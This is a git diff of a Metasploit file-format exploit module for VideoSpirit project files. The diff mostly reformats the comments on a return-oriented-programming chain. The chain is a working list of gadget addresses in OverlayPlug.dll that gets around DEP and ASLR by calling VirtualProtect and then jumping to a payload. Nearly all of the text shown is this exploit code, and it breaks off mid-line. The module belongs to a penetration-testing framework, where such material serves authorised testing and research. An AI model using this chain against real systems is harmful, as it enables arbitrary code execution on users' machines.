diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index c9d1c346be..e19638264e 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Acidgen', #found the vulnerability + 'Acidgen', #found the vulnerability 'corelanc0d3r', #rop exploit + msf module ], 'Version' => '$Revision$', @@ -113,26 +113,26 @@ class Metasploit3 < Msf::Exploit::Remote # one non-ASLR module is enough for generic ASLR & DEP bypass ! # pvefindaddr rop 'n roll # First, grab VirtualProtect ptr - 0x10065292, # POP EAX # RETN [Module : OverlayPlug.dll] ** - 0x106F4244, # IAT entry + offsqet (bad char friendly) - 0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** - 0xEFEFEFF0, # bye bye offset - 0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** - 0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [Module : OverlayPlug.dll] ** + 0x10065292, # POP EAX # RETN [OverlayPlug.dll] + 0x106F4244, # IAT entry + offsqet (bad char friendly) + 0x10019762, # POP EBP # RETN [OverlayPlug.dll] + 0xEFEFEFF0, # bye bye offset + 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll] + 0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : OverlayPlug.dll] ** - 0x10016A56, # XCHG EAX,ESI [Module : OverlayPlug.dll] ** + 0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll] + 0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll] # set size - 0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** - 0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :) - 0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] ** - 0xEFEFEFF0, # boo - 0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] ** - 0x10053E4C, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** - 0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [Module : OverlayPlug.dll] ** + 0x100A9274, # POP EAX # RETN [OverlayPlug.dll] + 0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :) + 0x10019762, # POP EBP # RETN [OverlayPlug.dll] + 0xEFEFEFF0, # boo + 0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll] + 0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll] + 0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, @@ -155,38 +155,38 @@ class Metasploit3 < Msf::Exploit::Remote rand_text_alphanumeric(4).unpack("L")[0].to_i, # set NewProtect to 0x40 - 0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [Module : OverlayPlug.dll] ** + 0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] ** + 0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, rand_text_alphanumeric(4).unpack("L")[0].to_i, - 0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [Module : OverlayPlug.dll] ** + 0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, # write pOldProtect to .data section - 0x1001AB51, # POP ECX # RETN [Module : OverlayPlug.dll] ** + 0x1001AB51, # POP ECX # RETN [OverlayPlug.dll] rand_text_alphanumeric(4).unpack("L")[0].to_i, 0x10117030, # RW # EDI : ROP NOP - 0x10057090, # POP EDI # RETN [Module : OverlayPlug.dll] ** + 0x10057090, # POP EDI # RETN [OverlayPlug.dll] 0x10057091, # ROP NOP # pReturn2Payload - 0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [Module : OverlayPlug.dll] ** - 0x10016A56, # XCHG EAX,ESI # RETN [Module : OverlayPlug.dll] ** - 0x1003C946, # ADD EAX,0A # RETN [Module : OverlayPlug.dll] + 0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll] + 0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll] + 0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll] 0x1003C946, 0x1003C946, 0x1003C946, @@ -206,23 +206,23 @@ class Metasploit3 < Msf::Exploit::Remote 0x1003C946, 0x1003C946, 0x1003C946, - 0x1001FDBD, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] ** + 0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll] - 0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] ** + 0x100A9274, # POP EAX # RETN [OverlayPlug.dll] 0x41414141, # go - 0x10066F84, # PUSHAD # RETN [Module : OverlayPlug.dll] ** + 0x10066F84, # PUSHAD # RETN [OverlayPlug.dll] ].pack("V*") - buffer = "